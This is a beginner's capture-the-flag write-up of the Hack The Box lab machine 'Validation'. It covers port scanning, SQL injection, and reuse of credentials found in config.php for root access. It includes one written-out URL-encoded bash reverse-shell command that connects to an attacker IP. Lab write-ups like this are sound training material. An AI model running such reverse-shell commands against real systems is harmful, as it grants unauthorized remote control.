Validation
Last updated
Last updated
This is my write-up for the machine called Validation located at: https://app.hackthebox.com/machines/Validation.
I am a beginner at penetration testing, so I will be referencing the Official Hack The Box Walk-through for this machine.
rustscan: rustscan -a 10.10.11.116
Going to port 80, we see this page:
On Hack The Box, I got a hint from one of the tags from the machine:
It seems that I need to run some type of SQL Injection on the page. After trying a bunch of SQL queries, I ended up running an nmap scan on the machine, since according to the walk-through, I had missed a bunch of open ports using rust scan:
After I got stuck, I found this write-up that basically made it understand where the vulnerability was:
I then got the following output:
This showed me that this is vulnerable to SQL Injection. Viewing the same write-up, I then changed the parameters to then submit to the website:
I then got stuck again and then watched this video that assisted a bit more in the understanding of what I was messing up on. I found out that I had to run the command to get a shell on the system:
After I ran this command, I was able to run commands on the system:
Apparently the IP Addresses of the VPN you are using on HTB can change, which was something I did not know. When I ran ifconfig, I understood why my reverse shell command was not working when I tried it. In any case, I got the reverse shell by running the following command (recommended by the official write-up and modified to work for me):
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/1234+0>%261'
In order to get this to work though, you have to change your request from GET to POST, which can be done by clicking on the button below:
You can then submit the command, as seen in the image above. After I had the shell, the first thing I did was find the user.txt file:
I was trying to find a way to upload linpeas.sh or get a way to see what access I had, but I ended up getting nowhere. On the official write-up, the credentials I had seen earlier in config.php, were the credentials for the root user:
I was then able to get the flag using the root access.